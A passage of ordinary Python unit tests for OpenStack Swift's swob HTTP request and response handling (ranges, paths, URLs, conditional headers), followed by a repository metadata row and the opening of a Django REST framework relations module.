too_big_date = time.strftime(
"%a, %d %b %Y %H:%M:%S UTC", time.struct_time(too_big_date_list))
req.if_unmodified_since = too_big_date
self.assertEqual(req.if_unmodified_since, None)
def test_bad_range(self):
req = swift.common.swob.Request.blank('/hi/there', body='hi')
req.range = 'bad range'
self.assertEquals(req.range, None)
def test_accept_header(self):
req = swift.common.swob.Request({'REQUEST_METHOD': 'GET',
'PATH_INFO': '/',
'HTTP_ACCEPT': 'application/json'})
self.assertEqual(
req.accept.best_match(['application/json', 'text/plain']),
'application/json')
self.assertEqual(
req.accept.best_match(['text/plain', 'application/json']),
'application/json')
def test_swift_entity_path(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
self.assertEqual(req.swift_entity_path, '/a/c/o')
req = swift.common.swob.Request.blank('/v1/a/c')
self.assertEqual(req.swift_entity_path, '/a/c')
req = swift.common.swob.Request.blank('/v1/a')
self.assertEqual(req.swift_entity_path, '/a')
req = swift.common.swob.Request.blank('/v1')
self.assertEqual(req.swift_entity_path, None)
def test_path_qs(self):
req = swift.common.swob.Request.blank('/hi/there?hello=equal&acl')
self.assertEqual(req.path_qs, '/hi/there?hello=equal&acl')
req = swift.common.swob.Request({'PATH_INFO': '/hi/there',
'QUERY_STRING': 'hello=equal&acl'})
self.assertEqual(req.path_qs, '/hi/there?hello=equal&acl')
def test_url(self):
req = swift.common.swob.Request.blank('/hi/there?hello=equal&acl')
self.assertEqual(req.url,
'http://localhost/hi/there?hello=equal&acl')
def test_wsgify(self):
used_req = []
@swift.common.swob.wsgify
def _wsgi_func(req):
used_req.append(req)
return swift.common.swob.Response('200 OK')
req = swift.common.swob.Request.blank('/hi/there')
resp = req.get_response(_wsgi_func)
self.assertEqual(used_req[0].path, '/hi/there')
self.assertEqual(resp.status_int, 200)
def test_wsgify_raise(self):
used_req = []
@swift.common.swob.wsgify
def _wsgi_func(req):
used_req.append(req)
raise swift.common.swob.HTTPServerError()
req = swift.common.swob.Request.blank('/hi/there')
resp = req.get_response(_wsgi_func)
self.assertEqual(used_req[0].path, '/hi/there')
self.assertEqual(resp.status_int, 500)
def test_split_path(self):
"""
Copied from swift.common.utils.split_path
"""
def _test_split_path(path, minsegs=1, maxsegs=None, rwl=False):
req = swift.common.swob.Request.blank(path)
return req.split_path(minsegs, maxsegs, rwl)
self.assertRaises(ValueError, _test_split_path, '')
self.assertRaises(ValueError, _test_split_path, '/')
self.assertRaises(ValueError, _test_split_path, '//')
self.assertEquals(_test_split_path('/a'), ['a'])
self.assertRaises(ValueError, _test_split_path, '//a')
self.assertEquals(_test_split_path('/a/'), ['a'])
self.assertRaises(ValueError, _test_split_path, '/a/c')
self.assertRaises(ValueError, _test_split_path, '//c')
self.assertRaises(ValueError, _test_split_path, '/a/c/')
self.assertRaises(ValueError, _test_split_path, '/a//')
self.assertRaises(ValueError, _test_split_path, '/a', 2)
self.assertRaises(ValueError, _test_split_path, '/a', 2, 3)
self.assertRaises(ValueError, _test_split_path, '/a', 2, 3, True)
self.assertEquals(_test_split_path('/a/c', 2), ['a', 'c'])
self.assertEquals(_test_split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, _test_split_path, '/a/c/o/r', 3, 3)
self.assertEquals(_test_split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEquals(_test_split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, _test_split_path, '/a', 5, 4)
self.assertEquals(_test_split_path('/a/c/', 2), ['a', 'c'])
self.assertEquals(_test_split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
_test_split_path('o\nn e', 2)
except ValueError as err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
try:
_test_split_path('o\nn e', 2, 3, True)
except ValueError as err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
def test_unicode_path(self):
req = swift.common.swob.Request.blank(u'/\u2661')
self.assertEquals(req.path, quote(u'/\u2661'.encode('utf-8')))
def test_unicode_query(self):
req = swift.common.swob.Request.blank(u'/')
req.query_string = u'x=\u2661'
self.assertEquals(req.params['x'], u'\u2661'.encode('utf-8'))
def test_url2(self):
pi = '/hi/there'
path = pi
req = swift.common.swob.Request.blank(path)
sche = 'http'
exp_url = '%s://localhost%s' % (sche, pi)
self.assertEqual(req.url, exp_url)
qs = 'hello=equal&acl'
path = '%s?%s' % (pi, qs)
s, p = 'unit.test.example.com', '90'
req = swift.common.swob.Request({'PATH_INFO': pi,
'QUERY_STRING': qs,
'SERVER_NAME': s,
'SERVER_PORT': p})
exp_url = '%s://%s:%s%s?%s' % (sche, s, p, pi, qs)
self.assertEqual(req.url, exp_url)
host = 'unit.test.example.com'
req = swift.common.swob.Request({'PATH_INFO': pi,
'QUERY_STRING': qs,
'HTTP_HOST': host + ':80'})
exp_url = '%s://%s%s?%s' % (sche, host, pi, qs)
self.assertEqual(req.url, exp_url)
host = 'unit.test.example.com'
sche = 'https'
req = swift.common.swob.Request({'PATH_INFO': pi,
'QUERY_STRING': qs,
'HTTP_HOST': host + ':443',
'wsgi.url_scheme': sche})
exp_url = '%s://%s%s?%s' % (sche, host, pi, qs)
self.assertEqual(req.url, exp_url)
host = 'unit.test.example.com:81'
req = swift.common.swob.Request({'PATH_INFO': pi,
'QUERY_STRING': qs,
'HTTP_HOST': host,
'wsgi.url_scheme': sche})
exp_url = '%s://%s%s?%s' % (sche, host, pi, qs)
self.assertEqual(req.url, exp_url)
def test_as_referer(self):
pi = '/hi/there'
qs = 'hello=equal&acl'
sche = 'https'
host = 'unit.test.example.com:81'
req = swift.common.swob.Request({'REQUEST_METHOD': 'POST',
'PATH_INFO': pi,
'QUERY_STRING': qs,
'HTTP_HOST': host,
'wsgi.url_scheme': sche})
exp_url = '%s://%s%s?%s' % (sche, host, pi, qs)
self.assertEqual(req.as_referer(), 'POST ' + exp_url)
def test_message_length_just_content_length(self):
req = swift.common.swob.Request.blank(
u'/',
environ={'REQUEST_METHOD': 'PUT', 'PATH_INFO': '/'})
self.assertEquals(req.message_length(), None)
req = swift.common.swob.Request.blank(
u'/',
environ={'REQUEST_METHOD': 'PUT', 'PATH_INFO': '/'},
body='x' * 42)
self.assertEquals(req.message_length(), 42)
req.headers['Content-Length'] = 'abc'
try:
req.message_length()
except ValueError as e:
self.assertEquals(str(e), "Invalid Content-Length header value")
else:
self.fail("Expected a ValueError raised for 'abc'")
def test_message_length_transfer_encoding(self):
req = swift.common.swob.Request.blank(
u'/',
environ={'REQUEST_METHOD': 'PUT', 'PATH_INFO': '/'},
headers={'transfer-encoding': 'chunked'},
body='x' * 42)
self.assertEquals(req.message_length(), None)
req.headers['Transfer-Encoding'] = 'gzip,chunked'
try:
req.message_length()
except AttributeError as e:
self.assertEquals(str(e), "Unsupported Transfer-Coding header"
" value specified in Transfer-Encoding header")
else:
self.fail("Expected an AttributeError raised for 'gzip'")
req.headers['Transfer-Encoding'] = 'gzip'
try:
req.message_length()
except ValueError as e:
self.assertEquals(str(e), "Invalid Transfer-Encoding header value")
else:
self.fail("Expected a ValueError raised for 'gzip'")
req.headers['Transfer-Encoding'] = 'gzip,identity'
try:
req.message_length()
except AttributeError as e:
self.assertEquals(str(e), "Unsupported Transfer-Coding header"
" value specified in Transfer-Encoding header")
else:
self.fail("Expected an AttributeError raised for 'gzip,identity'")
class TestStatusMap(unittest.TestCase):
def test_status_map(self):
response_args = []
def start_response(status, headers):
response_args.append(status)
response_args.append(headers)
resp_cls = swift.common.swob.status_map[404]
resp = resp_cls()
self.assertEquals(resp.status_int, 404)
self.assertEquals(resp.title, 'Not Found')
body = ''.join(resp({}, start_response))
self.assert_('The resource could not be found.' in body)
self.assertEquals(response_args[0], '404 Not Found')
headers = dict(response_args[1])
self.assertEquals(headers['Content-Type'], 'text/html; charset=UTF-8')
self.assert_(int(headers['Content-Length']) > 0)
class TestResponse(unittest.TestCase):
def _get_response(self):
def test_app(environ, start_response):
start_response('200 OK', [])
return ['hi']
req = swift.common.swob.Request.blank('/')
return req.get_response(test_app)
def test_properties(self):
resp = self._get_response()
resp.location = 'something'
self.assertEquals(resp.location, 'something')
self.assert_('Location' in resp.headers)
resp.location = None
self.assert_('Location' not in resp.headers)
resp.content_type = 'text/plain'
self.assert_('Content-Type' in resp.headers)
resp.content_type = None
self.assert_('Content-Type' not in resp.headers)
def test_empty_body(self):
resp = self._get_response()
resp.body = ''
self.assertEquals(resp.body, '')
def test_unicode_body(self):
resp = self._get_response()
resp.body = u'\N{SNOWMAN}'
self.assertEquals(resp.body, u'\N{SNOWMAN}'.encode('utf-8'))
def test_call_reifies_request_if_necessary(self):
"""
The actual bug was a HEAD response coming out with a body because the
Request object wasn't passed into the Response object's constructor.
The Response object's __call__ method should be able to reify a
Request object from the env it gets passed.
"""
def test_app(environ, start_response):
start_response('200 OK', [])
return ['hi']
req = swift.common.swob.Request.blank('/')
req.method = 'HEAD'
status, headers, app_iter = req.call_application(test_app)
resp = swift.common.swob.Response(status=status, headers=dict(headers),
app_iter=app_iter)
output_iter = resp(req.environ, lambda *_: None)
self.assertEquals(list(output_iter), [''])
def test_call_preserves_closeability(self):
def test_app(environ, start_response):
start_response('200 OK', [])
yield "igloo"
yield "shindig"
yield "macadamia"
yield "hullabaloo"
req = swift.common.swob.Request.blank('/')
req.method = 'GET'
status, headers, app_iter = req.call_application(test_app)
iterator = iter(app_iter)
self.assertEqual('igloo', next(iterator))
self.assertEqual('shindig', next(iterator))
app_iter.close()
self.assertRaises(StopIteration, iterator.next)
def test_location_rewrite(self):
def start_response(env, headers):
pass
req = swift.common.swob.Request.blank(
'/', environ={'HTTP_HOST': 'somehost'})
resp = self._get_response()
resp.location = '/something'
# read response
''.join(resp(req.environ, start_response))
self.assertEquals(resp.location, 'http://somehost/something')
req = swift.common.swob.Request.blank(
'/', environ={'HTTP_HOST': 'somehost:80'})
resp = self._get_response()
resp.location = '/something'
# read response
''.join(resp(req.environ, start_response))
self.assertEquals(resp.location, 'http://somehost/something')
req = swift.common.swob.Request.blank(
'/', environ={'HTTP_HOST': 'somehost:443',
'wsgi.url_scheme': 'http'})
resp = self._get_response()
resp.location = '/something'
# read response
''.join(resp(req.environ, start_response))
self.assertEquals(resp.location, 'http://somehost:443/something')
req = swift.common.swob.Request.blank(
'/', environ={'HTTP_HOST': 'somehost:443',
'wsgi.url_scheme': 'https'})
resp = self._get_response()
resp.location = '/something'
# read response
''.join(resp(req.environ, start_response))
self.assertEquals(resp.location, 'https://somehost/something')
def test_location_rewrite_no_host(self):
def start_response(env, headers):
pass
req = swift.common.swob.Request.blank(
'/', environ={'SERVER_NAME': 'local', 'SERVER_PORT': 80})
del req.environ['HTTP_HOST']
resp = self._get_response()
resp.location = '/something'
# read response
''.join(resp(req.environ, start_response))
self.assertEquals(resp.location, 'http://local/something')
req = swift.common.swob.Request.blank(
'/', environ={'SERVER_NAME': 'local', 'SERVER_PORT': 81})
del req.environ['HTTP_HOST']
resp = self._get_response()
resp.location = '/something'
# read response
''.join(resp(req.environ, start_response))
self.assertEquals(resp.location, 'http://local:81/something')
def test_location_no_rewrite(self):
def start_response(env, headers):
pass
req = swift.common.swob.Request.blank(
'/', environ={'HTTP_HOST': 'somehost'})
resp = self._get_response()
resp.location = 'http://www.google.com/'
# read response
''.join(resp(req.environ, start_response))
self.assertEquals(resp.location, 'http://www.google.com/')
def test_location_no_rewrite_when_told_not_to(self):
def start_response(env, headers):
pass
req = swift.common.swob.Request.blank(
'/', environ={'SERVER_NAME': 'local', 'SERVER_PORT': 81,
'swift.leave_relative_location': True})
del req.environ['HTTP_HOST']
resp = self._get_response()
resp.location = '/something'
# read response
''.join(resp(req.environ, start_response))
self.assertEquals(resp.location, '/something')
def test_app_iter(self):
def start_response(env, headers):
pass
resp = self._get_response()
resp.app_iter = ['a', 'b', 'c']
body = ''.join(resp({}, start_response))
self.assertEquals(body, 'abc')
def test_multi_ranges_wo_iter_ranges(self):
def test_app(environ, start_response):
start_response('200 OK', [('Content-Length', '10')])
return ['1234567890']
req = swift.common.swob.Request.blank(
'/', headers={'Range': 'bytes=0-9,10-19,20-29'})
resp = req.get_response(test_app)
resp.conditional_response = True
resp.content_length = 10
# read response
''.join(resp._response_iter(resp.app_iter, ''))
self.assertEquals(resp.status, '200 OK')
self.assertEqual(10, resp.content_length)
def test_single_range_wo_iter_range(self):
def test_app(environ, start_response):
start_response('200 OK', [('Content-Length', '10')])
return ['1234567890']
req = swift.common.swob.Request.blank(
'/', headers={'Range': 'bytes=0-9'})
resp = req.get_response(test_app)
resp.conditional_response = True
resp.content_length = 10
# read response
''.join(resp._response_iter(resp.app_iter, ''))
self.assertEquals(resp.status, '200 OK')
self.assertEqual(10, resp.content_length)
def test_multi_range_body(self):
def test_app(environ, start_response):
start_response('200 OK', [('Content-Length', '4')])
return ['abcd']
req = swift.common.swob.Request.blank(
'/', headers={'Range': 'bytes=0-9,10-19,20-29'})
resp = req.get_response(test_app)
resp.conditional_response = True
resp.content_length = 100
resp.content_type = 'text/plain'
content = ''.join(resp._response_iter(None,
('0123456789112345678'
'92123456789')))
self.assert_(re.match(('--[a-f0-9]{32}\r\n'
'Content-Type: text/plain\r\n'
'Content-Range: bytes '
'0-9/100\r\n\r\n0123456789\r\n'
'--[a-f0-9]{32}\r\n'
'Content-Type: text/plain\r\n'
'Content-Range: bytes '
'10-19/100\r\n\r\n1123456789\r\n'
'--[a-f0-9]{32}\r\n'
'Content-Type: text/plain\r\n'
'Content-Range: bytes '
'20-29/100\r\n\r\n2123456789\r\n'
'--[a-f0-9]{32}--'), content))
def test_multi_response_iter(self):
def test_app(environ, start_response):
start_response('200 OK', [('Content-Length', '10'),
('Content-Type', 'application/xml')])
return ['0123456789']
app_iter_ranges_args = []
class App_iter(object):
def app_iter_ranges(self, ranges, content_type, boundary, size):
app_iter_ranges_args.append((ranges, content_type, boundary,
size))
for i in range(3):
yield str(i) + 'fun'
yield boundary
def __iter__(self):
for i in range(3):
yield str(i) + 'fun'
req = swift.common.swob.Request.blank(
'/', headers={'Range': 'bytes=1-5,8-11'})
resp = req.get_response(test_app)
resp.conditional_response = True
resp.content_length = 12
content = ''.join(resp._response_iter(App_iter(), ''))
boundary = content[-32:]
self.assertEqual(content[:-32], '0fun1fun2fun')
self.assertEqual(app_iter_ranges_args,
[([(1, 6), (8, 12)], 'application/xml',
boundary, 12)])
def test_range_body(self):
def test_app(environ, start_response):
start_response('200 OK', [('Content-Length', '10')])
return ['1234567890']
def start_response(env, headers):
pass
req = swift.common.swob.Request.blank(
'/', headers={'Range': 'bytes=1-3'})
resp = swift.common.swob.Response(
body='1234567890', request=req,
conditional_response=True)
body = ''.join(resp([], start_response))
self.assertEquals(body, '234')
self.assertEquals(resp.content_range, 'bytes 1-3/10')
self.assertEquals(resp.status, '206 Partial Content')
# syntactically valid, but does not make sense, so returning 416
# in next couple of cases.
req = swift.common.swob.Request.blank(
'/', headers={'Range': 'bytes=-0'})
resp = req.get_response(test_app)
resp.conditional_response = True
body = ''.join(resp([], start_response))
self.assertEquals(body, '')
self.assertEquals(resp.content_length, 0)
self.assertEquals(resp.status, '416 Requested Range Not Satisfiable')
resp = swift.common.swob.Response(
body='1234567890', request=req,
conditional_response=True)
body = ''.join(resp([], start_response))
self.assertEquals(body, '')
self.assertEquals(resp.content_length, 0)
self.assertEquals(resp.status, '416 Requested Range Not Satisfiable')
# Syntactically-invalid Range headers "MUST" be ignored
req = swift.common.swob.Request.blank(
'/', headers={'Range': 'bytes=3-2'})
resp = req.get_response(test_app)
resp.conditional_response = True
body = ''.join(resp([], start_response))
self.assertEquals(body, '1234567890')
self.assertEquals(resp.status, '200 OK')
resp = swift.common.swob.Response(
body='1234567890', request=req,
conditional_response=True)
body = ''.join(resp([], start_response))
self.assertEquals(body, '1234567890')
self.assertEquals(resp.status, '200 OK')
def test_content_type(self):
resp = self._get_response()
resp.content_type = 'text/plain; charset=utf8'
self.assertEquals(resp.content_type, 'text/plain')
def test_charset(self):
resp = self._get_response()
resp.content_type = 'text/plain; charset=utf8'
self.assertEquals(resp.charset, 'utf8')
resp.charset = 'utf16'
self.assertEquals(resp.charset, 'utf16')
def test_charset_content_type(self):
resp = swift.common.swob.Response(
content_type='text/plain', charset='utf-8')
self.assertEquals(resp.charset, 'utf-8')
resp = swift.common.swob.Response(
charset='utf-8', content_type='text/plain')
self.assertEquals(resp.charset, 'utf-8')
def test_etag(self):
resp = self._get_response()
resp.etag = 'hi'
self.assertEquals(resp.headers['Etag'], '"hi"')
self.assertEquals(resp.etag, 'hi')
self.assert_('etag' in resp.headers)
resp.etag = None
self.assert_('etag' not in resp.headers)
def test_host_url_default(self):
resp = self._get_response()
env = resp.environ
env['wsgi.url_scheme'] = 'http'
env['SERVER_NAME'] = 'bob'
env['SERVER_PORT'] = '1234'
del env['HTTP_HOST']
self.assertEquals(resp.host_url, 'http://bob:1234')
def test_host_url_default_port_squelched(self):
resp = self._get_response()
env = resp.environ
env['wsgi.url_scheme'] = 'http'
env['SERVER_NAME'] = 'bob'
env['SERVER_PORT'] = '80'
del env['HTTP_HOST']
self.assertEquals(resp.host_url, 'http://bob')
def test_host_url_https(self):
resp = self._get_response()
env = resp.environ
env['wsgi.url_scheme'] = 'https'
env['SERVER_NAME'] = 'bob'
env['SERVER_PORT'] = '1234'
del env['HTTP_HOST']
self.assertEquals(resp.host_url, 'https://bob:1234')
def test_host_url_https_port_squelched(self):
resp = self._get_response()
env = resp.environ
env['wsgi.url_scheme'] = 'https'
env['SERVER_NAME'] = 'bob'
env['SERVER_PORT'] = '443'
del env['HTTP_HOST']
self.assertEquals(resp.host_url, 'https://bob')
def test_host_url_host_override(self):
resp = self._get_response()
env = resp.environ
env['wsgi.url_scheme'] = 'http'
env['SERVER_NAME'] = 'bob'
env['SERVER_PORT'] = '1234'
env['HTTP_HOST'] = 'someother'
self.assertEquals(resp.host_url, 'http://someother')
def test_host_url_host_port_override(self):
resp = self._get_response()
env = resp.environ
env['wsgi.url_scheme'] = 'http'
env['SERVER_NAME'] = 'bob'
env['SERVER_PORT'] = '1234'
env['HTTP_HOST'] = 'someother:5678'
self.assertEquals(resp.host_url, 'http://someother:5678')
def test_host_url_host_https(self):
resp = self._get_response()
env = resp.environ
env['wsgi.url_scheme'] = 'https'
env['SERVER_NAME'] = 'bob'
env['SERVER_PORT'] = '1234'
env['HTTP_HOST'] = 'someother:5678'
self.assertEquals(resp.host_url, 'https://someother:5678')
def test_507(self):
resp = swift.common.swob.HTTPInsufficientStorage()
content = ''.join(resp._response_iter(resp.app_iter, resp._body))
self.assertEquals(
content,
'<html><h1>Insufficient Storage</h1><p>There was not enough space '
'to save the resource. Drive: unknown</p></html>')
resp = swift.common.swob.HTTPInsufficientStorage(drive='sda1')
content = ''.join(resp._response_iter(resp.app_iter, resp._body))
self.assertEquals(
content,
'<html><h1>Insufficient Storage</h1><p>There was not enough space '
'to save the resource. Drive: sda1</p></html>')
def test_200_with_body_and_headers(self):
headers = {'Content-Length': '0'}
content = 'foo'
resp = swift.common.swob.HTTPOk(body=content, headers=headers)
self.assertEquals(resp.body, content)
self.assertEquals(resp.content_length, len(content))
def test_init_with_body_headers_app_iter(self):
# body exists but no headers and no app_iter
body = 'ok'
resp = swift.common.swob.Response(body=body)
self.assertEquals(resp.body, body)
self.assertEquals(resp.content_length, len(body))
# body and headers with 0 content_length exist but no app_iter
body = 'ok'
resp = swift.common.swob.Response(
body=body, headers={'Content-Length': '0'})
self.assertEquals(resp.body, body)
self.assertEquals(resp.content_length, len(body))
# body and headers with content_length exist but no app_iter
body = 'ok'
resp = swift.common.swob.Response(
body=body, headers={'Content-Length': '5'})
self.assertEquals(resp.body, body)
self.assertEquals(resp.content_length, len(body))
# body and headers with no content_length exist but no app_iter
body = 'ok'
resp = swift.common.swob.Response(body=body, headers={})
self.assertEquals(resp.body, body)
self.assertEquals(resp.content_length, len(body))
# body, headers with content_length and app_iter exist
resp = swift.common.swob.Response(
body='ok', headers={'Content-Length': '5'}, app_iter=iter([]))
self.assertEquals(resp.content_length, 5)
self.assertEquals(resp.body, '')
# headers with content_length and app_iter exist but no body
resp = swift.common.swob.Response(
headers={'Content-Length': '5'}, app_iter=iter([]))
self.assertEquals(resp.content_length, 5)
self.assertEquals(resp.body, '')
# app_iter exists but no body and headers
resp = swift.common.swob.Response(app_iter=iter([]))
self.assertEquals(resp.content_length, None)
self.assertEquals(resp.body, '')
class TestUTC(unittest.TestCase):
def test_tzname(self):
self.assertEquals(swift.common.swob.UTC.tzname(None), 'UTC')
class TestConditionalIfNoneMatch(unittest.TestCase):
def fake_app(self, environ, start_response):
start_response('200 OK', [('Etag', 'the-etag')])
return ['hi']
def fake_start_response(*a, **kw):
pass
def test_simple_match(self):
# etag matches --> 304
req = swift.common.swob.Request.blank(
'/', headers={'If-None-Match': 'the-etag'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 304)
self.assertEquals(body, '')
def test_quoted_simple_match(self):
# double quotes don't matter
req = swift.common.swob.Request.blank(
'/', headers={'If-None-Match': '"the-etag"'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 304)
self.assertEquals(body, '')
def test_list_match(self):
# it works with lists of etags to match
req = swift.common.swob.Request.blank(
'/', headers={'If-None-Match': '"bert", "the-etag", "ernie"'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 304)
self.assertEquals(body, '')
def test_list_no_match(self):
# no matches --> whatever the original status was
req = swift.common.swob.Request.blank(
'/', headers={'If-None-Match': '"bert", "ernie"'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
def test_match_star(self):
# "*" means match anything; see RFC 2616 section 14.24
req = swift.common.swob.Request.blank(
'/', headers={'If-None-Match': '*'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 304)
self.assertEquals(body, '')
class TestConditionalIfMatch(unittest.TestCase):
def fake_app(self, environ, start_response):
start_response('200 OK', [('Etag', 'the-etag')])
return ['hi']
def fake_start_response(*a, **kw):
pass
def test_simple_match(self):
# if etag matches, proceed as normal
req = swift.common.swob.Request.blank(
'/', headers={'If-Match': 'the-etag'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
def test_simple_conditional_etag_match(self):
# if etag matches, proceed as normal
req = swift.common.swob.Request.blank(
'/', headers={'If-Match': 'not-the-etag'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
resp._conditional_etag = 'not-the-etag'
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
def test_quoted_simple_match(self):
# double quotes or not, doesn't matter
req = swift.common.swob.Request.blank(
'/', headers={'If-Match': '"the-etag"'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
def test_no_match(self):
# no match --> 412
req = swift.common.swob.Request.blank(
'/', headers={'If-Match': 'not-the-etag'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 412)
self.assertEquals(body, '')
def test_simple_conditional_etag_no_match(self):
req = swift.common.swob.Request.blank(
'/', headers={'If-Match': 'the-etag'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
resp._conditional_etag = 'not-the-etag'
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 412)
self.assertEquals(body, '')
def test_match_star(self):
# "*" means match anything; see RFC 2616 section 14.24
req = swift.common.swob.Request.blank(
'/', headers={'If-Match': '*'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
def test_match_star_on_404(self):
def fake_app_404(environ, start_response):
start_response('404 Not Found', [])
return ['hi']
req = swift.common.swob.Request.blank(
'/', headers={'If-Match': '*'})
resp = req.get_response(fake_app_404)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 412)
self.assertEquals(body, '')
class TestConditionalIfModifiedSince(unittest.TestCase):
def fake_app(self, environ, start_response):
start_response(
'200 OK', [('Last-Modified', 'Thu, 27 Feb 2014 03:29:37 GMT')])
return ['hi']
def fake_start_response(*a, **kw):
pass
def test_absent(self):
req = swift.common.swob.Request.blank('/')
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
def test_before(self):
req = swift.common.swob.Request.blank(
'/',
headers={'If-Modified-Since': 'Thu, 27 Feb 2014 03:29:36 GMT'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
def test_same(self):
req = swift.common.swob.Request.blank(
'/',
headers={'If-Modified-Since': 'Thu, 27 Feb 2014 03:29:37 GMT'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 304)
self.assertEquals(body, '')
def test_greater(self):
req = swift.common.swob.Request.blank(
'/',
headers={'If-Modified-Since': 'Thu, 27 Feb 2014 03:29:38 GMT'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 304)
self.assertEquals(body, '')
def test_out_of_range_is_ignored(self):
# All that datetime gives us is a ValueError or OverflowError when
# something is out of range (i.e. less than datetime.datetime.min or
# greater than datetime.datetime.max). Unfortunately, we can't
# distinguish between a date being too old and a date being too new,
# so the best we can do is ignore such headers.
max_date_list = list(datetime.datetime.max.timetuple())
max_date_list[0] += 1 # bump up the year
too_big_date_header = time.strftime(
"%a, %d %b %Y %H:%M:%S GMT", time.struct_time(max_date_list))
req = swift.common.swob.Request.blank(
'/',
headers={'If-Modified-Since': too_big_date_header})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
class TestConditionalIfUnmodifiedSince(unittest.TestCase):
def fake_app(self, environ, start_response):
start_response(
'200 OK', [('Last-Modified', 'Thu, 20 Feb 2014 03:29:37 GMT')])
return ['hi']
def fake_start_response(*a, **kw):
pass
def test_absent(self):
req = swift.common.swob.Request.blank('/')
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
def test_before(self):
req = swift.common.swob.Request.blank(
'/',
headers={'If-Unmodified-Since': 'Thu, 20 Feb 2014 03:29:36 GMT'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 412)
self.assertEquals(body, '')
def test_same(self):
req = swift.common.swob.Request.blank(
'/',
headers={'If-Unmodified-Since': 'Thu, 20 Feb 2014 03:29:37 GMT'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
def test_greater(self):
req = swift.common.swob.Request.blank(
'/',
headers={'If-Unmodified-Since': 'Thu, 20 Feb 2014 03:29:38 GMT'})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
def test_out_of_range_is_ignored(self):
# All that datetime gives us is a ValueError or OverflowError when
# something is out of range (i.e. less than datetime.datetime.min or
# greater than datetime.datetime.max). Unfortunately, we can't
# distinguish between a date being too old and a date being too new,
# so the best we can do is ignore such headers.
max_date_list = list(datetime.datetime.max.timetuple())
max_date_list[0] += 1 # bump up the year
too_big_date_header = time.strftime(
"%a, %d %b %Y %H:%M:%S GMT", time.struct_time(max_date_list))
req = swift.common.swob.Request.blank(
'/',
headers={'If-Unmodified-Since': too_big_date_header})
resp = req.get_response(self.fake_app)
resp.conditional_response = True
body = ''.join(resp(req.environ, self.fake_start_response))
self.assertEquals(resp.status_int, 200)
self.assertEquals(body, 'hi')
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
polojacky/ehfpi | ehf/rest_framework/relations.py | 7 | 24789 | """
Serializer fields that deal with relationships.
These fields allow you to specify the style that should be used to represent
model relationships, including hyperlinks, primary keys, or slugs.
"""
from __future__ import unicode_literals
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.core.urlresolvers import resolve, get_script_prefix, NoReverseMatch
from django import forms
from django.db.models.fields import BLANK_CHOICE_DASH
from django.forms import widgets
from django.forms.models import ModelChoiceIterator
from django.utils.translation import ugettext_lazy as _
from rest_framework.fields import Field, WritableField, get_component, is_simple_callable
from rest_framework.reverse import reverse
from rest_framework.compat import urlparse
from rest_framework.compat import smart_text
import warnings
##### Relational fields #####
# Not actually Writable, but subclasses may need to be.
class RelatedField(WritableField):
"""
Base class for related model fields.
This represents a relationship using the unicode representation of the target.
"""
widget = widgets.Select
